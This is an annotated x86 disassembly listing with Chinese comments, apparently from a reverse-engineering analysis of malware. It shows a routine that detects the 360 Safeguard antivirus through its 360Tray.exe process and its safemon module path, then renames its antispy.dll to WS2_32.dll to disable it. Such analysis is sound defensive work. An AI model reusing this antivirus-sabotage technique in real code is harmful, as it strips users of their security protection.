004014E3 90 nop ; 检测是否存在360卫士 004014E4 /$ 81EC 50040000 sub esp, 450 ; 将360卫士的antispy.dll重命名为WS2_32.dll 004014EA |. 53 push ebx 004014EB |. 6A 00 push 0 ; /ProcessID = 0 004014ED |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS 004014EF |. C74424 0C 280>mov dword ptr [esp+C], 128 ; | 004014F7 |. C78424 380200>mov dword ptr [esp+238], 224 ; | 00401502 |. E8 A9080000 call 00401DB0 ; \CreateToolhelp32Snapshot 00401507 |. 8BD8 mov ebx, eax 00401509 |. 85DB test ebx, ebx 0040150B |. 0F84 55010000 je 00401666 00401511 |. 55 push ebp 00401512 |. 8D4424 08 lea eax, dword ptr [esp+8] 00401516 |. 56 push esi 00401517 |. 50 push eax ; /lppe 00401518 |. 53 push ebx ; |hSnapshot 00401519 |. E8 8C080000 call 00401DAA ; \Process32First 0040151E |. 8B2D B8204000 mov ebp, dword ptr [4020B8] ; kernel32.CloseHandle 00401524 |. 85C0 test eax, eax 00401526 |. 0F84 35010000 je 00401661 0040152C |. 8B35 30214000 mov esi, dword ptr [402130] ; SHLWAPI.StrStrIA 00401532 |> 8D4C24 30 /lea ecx, dword ptr [esp+30] ; 查查找是否有360Tray.exe进程存在,如果有转到40155E 00401536 |. 68 70304000 |push 00403070 ; ASCII "360tRaY.eXe" 0040153B |. 51 |push ecx 0040153C |. FFD6 |call esi 0040153E |. 85C0 |test eax, eax 00401540 |. 75 1C |jnz short 0040155E 00401542 |. 8D5424 0C |lea edx, dword ptr [esp+C] 00401546 |. 52 |push edx ; /lppe 00401547 |. 53 |push ebx ; |hSnapshot 00401548 |. E8 57080000 |call 00401DA4 ; \Process32Next 0040154D |. 85C0 |test eax, eax 0040154F |.^ 75 E1 \jnz short 00401532 00401551 |. 53 push ebx 00401552 |. FFD5 call ebp 00401554 |. 5E pop esi 00401555 |. 5D pop ebp 00401556 |. 5B pop ebx 00401557 |. 81C4 50040000 add esp, 450 0040155D |. C3 retn 0040155E |> 8B4424 14 mov eax, dword ptr [esp+14] 00401562 |. 50 push eax ; /ProcessID 00401563 |. 6A 08 push 8 ; |Flags = TH32CS_SNAPMODULE 00401565 |. E8 46080000 call 00401DB0 ; \CreateToolhelp32Snapshot 0040156A |. 8BF0 mov esi, eax 0040156C |. 85F6 test esi, esi 0040156E |. 0F84 ED000000 je 00401661 00401574 |. 8D8C24 380200>lea ecx, dword ptr [esp+238] ; 获得文件路径 0040157B |. 51 push ecx ; /pModuleentry 0040157C |. 56 push esi ; |hSnapshot 0040157D |. E8 34080000 call 00401DB6 ; \Module32First 00401582 |. 85C0 test eax, eax 00401584 |. 0F84 D7000000 je 00401661 0040158A |. 56 push esi 0040158B |. FFD5 call ebp 0040158D |. 8D9424 580300>lea edx, dword ptr [esp+358] ; 文件路径中是否包含safemon,如果有就确认是360的进程 00401594 |. 68 68304000 push 00403068 ; /s2 = "safemon" 00401599 |. 52 push edx ; |s1 0040159A |. FF15 E8204000 call dword ptr [4020E8] ; \strstr 004015A0 |. 83C4 08 add esp, 8 004015A3 |. 85C0 test eax, eax 004015A5 |. 0F84 B6000000 je 00401661 004015AB |. 57 push edi 004015AC |. C600 00 mov byte ptr [eax], 0 004015AF |. B9 41000000 mov ecx, 41 004015B4 |. 33C0 xor eax, eax 004015B6 |. 8DBC24 380100>lea edi, dword ptr [esp+138] 004015BD |. 8D9424 380100>lea edx, dword ptr [esp+138] 004015C4 |. F3:AB rep stos dword ptr es:[edi] 004015C6 |. 83C9 FF or ecx, FFFFFFFF 004015C9 |. 8DBC24 5C0300>lea edi, dword ptr [esp+35C] 004015D0 |. F2:AE repne scas byte ptr es:[edi] 004015D2 |. F7D1 not ecx 004015D4 |. 2BF9 sub edi, ecx ; 文件移动 004015D6 |. 6A 01 push 1 ; /Flags = REPLACE_EXISTING 004015D8 |. 8BC1 mov eax, ecx ; | 004015DA |. 8BF7 mov esi, edi ; | 004015DC |. C1E9 02 shr ecx, 2 ; | 004015DF |. 8BFA mov edi, edx ; | 004015E1 |. 8D9424 3C0100>lea edx, dword ptr [esp+13C] ; | 004015E8 |. F3:A5 rep movs dword ptr es:[edi], dword p>; | 004015EA |. 8BC8 mov ecx, eax ; | 004015EC |. 33C0 xor eax, eax ; | 004015EE |. 83E1 03 and ecx, 3 ; | 004015F1 |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; | 004015F3 |. BF 5C304000 mov edi, 0040305C ; |ASCII "WS2_32.dll" 004015F8 |. 83C9 FF or ecx, FFFFFFFF ; | 004015FB |. F2:AE repne scas byte ptr es:[edi] ; | 004015FD |. F7D1 not ecx ; | 004015FF |. 2BF9 sub edi, ecx ; | 00401601 |. 8BF7 mov esi, edi ; | 00401603 |. 8BFA mov edi, edx ; | 00401605 |. 8BD1 mov edx, ecx ; | 00401607 |. 83C9 FF or ecx, FFFFFFFF ; | 0040160A |. F2:AE repne scas byte ptr es:[edi] ; | 0040160C |. 8BCA mov ecx, edx ; | 0040160E |. 4F dec edi ; | 0040160F |. C1E9 02 shr ecx, 2 ; | 00401612 |. F3:A5 rep movs dword ptr es:[edi], dword p>; | 00401614 |. 8BCA mov ecx, edx ; | 00401616 |. 8D9424 600300>lea edx, dword ptr [esp+360] ; | 0040161D |. 83E1 03 and ecx, 3 ; | 00401620 |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; | 00401622 |. BF 50304000 mov edi, 00403050 ; |ASCII "antispy.dll" 00401627 |. 83C9 FF or ecx, FFFFFFFF ; | 0040162A |. F2:AE repne scas byte ptr es:[edi] ; | 0040162C |. F7D1 not ecx ; | 0040162E |. 2BF9 sub edi, ecx ; | 00401630 |. 8BF7 mov esi, edi ; | 00401632 |. 8BFA mov edi, edx ; | 00401634 |. 8BD1 mov edx, ecx ; | 00401636 |. 83C9 FF or ecx, FFFFFFFF ; | 00401639 |. F2:AE repne scas byte ptr es:[edi] ; | 0040163B |. 8BCA mov ecx, edx ; | 0040163D |. 4F dec edi ; | 0040163E |. C1E9 02 shr ecx, 2 ; | 00401641 |. F3:A5 rep movs dword ptr es:[edi], dword p>; | 00401643 |. 8BCA mov ecx, edx ; | 00401645 |. 8D8424 3C0100>lea eax, dword ptr [esp+13C] ; | 0040164C |. 83E1 03 and ecx, 3 ; | 0040164F |. 50 push eax ; |NewName 00401650 |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; | 00401652 |. 8D8C24 640300>lea ecx, dword ptr [esp+364] ; | 00401659 |. 51 push ecx ; |ExistingName 0040165A |. FF15 78204000 call dword ptr [402078] ; \MoveFileExA 00401660 |. 5F pop edi 00401661 |> 53 push ebx 00401662 |. FFD5 call ebp 00401664 |. 5E pop esi 00401665 |. 5D pop ebp 00401666 |> 5B pop ebx 00401667 |. 81C4 50040000 add esp, 450 0040166D \. C3 retn
|